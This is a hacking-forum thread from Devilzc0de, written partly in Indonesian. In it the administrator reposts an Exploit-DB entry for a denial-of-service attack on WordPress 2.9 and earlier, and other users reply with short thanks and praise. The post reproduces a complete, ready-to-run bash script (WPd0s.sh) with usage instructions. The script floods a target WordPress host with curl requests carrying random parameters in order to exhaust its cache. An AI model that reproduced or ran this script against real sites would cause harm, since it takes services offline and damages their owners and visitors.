Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-25-2013, 10:59 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 11 12 13 14 15 Next »

0day Wordpress DOS <= 2.9

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
0day Wordpress DOS <= 2.9
01-04-2010, 04:20 AM
Post: #1
wenkhairu Offline
Administrator
*******
Administrators
Posts: 1,344
Joined: Dec 2009
Reputation: 260
0day Wordpress DOS <= 2.9
# Title: 0day Wordpress DOS <= 2.9
# EDB-ID: 10825
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
#!/bin/bash
#
# Copyright © 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#

show_help(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}

show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}

show_prereq(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}

show_usage(){
echo ""
echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}


# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done

[ -z "$host" ] && { show_help; exit 1; }

for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done

# 2009-12-30 enJoy.
Visit this user's website Find all posts by this user
Quote this message in a reply
01-07-2010, 04:24 PM
Post: #2
petimati Offline
DC Security Grup
*****
DC Security Grup
Posts: 372
Joined: Nov 2009
Reputation: 10
RE: 0day Wordpress DOS <= 2.9
top markotop...om wen ne
Find all posts by this user
Quote this message in a reply
01-11-2010, 06:40 PM
Post: #3
Cruz3N Offline
Mod Terganteng
****
Global Moderators
Posts: 1,651
Joined: Dec 2009
Reputation: 72
RE: 0day Wordpress DOS <= 2.9
Jiah.... Bahaya neh... Pantesan langsung ada versi 2.9.1-nya... Masih kena gak tuh...
Nice info Bro...
Visit this user's website Find all posts by this user
Quote this message in a reply
01-14-2010, 11:04 AM
Post: #4
petimati Offline
DC Security Grup
*****
DC Security Grup
Posts: 372
Joined: Nov 2009
Reputation: 10
RE: 0day Wordpress DOS <= 2.9
mantap...om wen
Find all posts by this user
Quote this message in a reply
01-15-2010, 02:26 AM
Post: #5
wenkhairu Offline
Administrator
*******
Administrators
Posts: 1,344
Joined: Dec 2009
Reputation: 260
RE: 0day Wordpress DOS <= 2.9
nyang mantab bukan ane om om :)
tapi yang nemuin bug :)
ane mana tau nyang beginian, cuman copas aja :)
Visit this user's website Find all posts by this user
Quote this message in a reply
01-24-2010, 06:53 PM
Post: #6
XGooooogle Offline
./Devilz Officer
Posts: 101
Joined: Dec 2009
Reputation: 2
RE: 0day Wordpress DOS <= 2.9
eniwei thanks udah mengulurkan tangan
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php) XPByte 16 1,045 05-19-2013 05:40 PM
Last Post: oe_c0x
  WordPress LeagueManager Plugin v3.8 eskiel go.id 12 184 04-01-2013 02:00 PM
Last Post: beg3nk newb1e
Thumbs Up [Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload Regel 11 673 02-02-2013 12:19 AM
Last Post: copaker21
  Wordpress Plugins Pecemaker chastiter 4 198 07-29-2012 07:58 AM
Last Post: blackhariki
Bug - Joomla VS Wordpress Exploits Report: nuxbie_cyber 11 358 02-27-2012 12:46 AM
Last Post: Death Note
  Multiple WordPress Themes timthumb.php Vulnerabilites tempe_mendoan 8 401 09-25-2011 08:53 AM
Last Post: Initial-d
  Google Urchin 5.7.03 LFI Vulnerability 0day sheehan 1 80 12-16-2010 05:59 PM
Last Post: armytheludher
  10 Vuln plugins in wordpress lolipop 10 216 10-23-2010 08:46 AM
Last Post: dewancc
  Vuln WP-Cumulus 1.20 for WordPress p0k3r 8 216 07-14-2010 12:13 AM
Last Post: p0k3r
  wordpress 1.7.4 SQLinjection MaViA_HaXx0r 6 236 06-28-2010 11:20 AM
Last Post: scr34mz

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-25-2013, 10:59 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE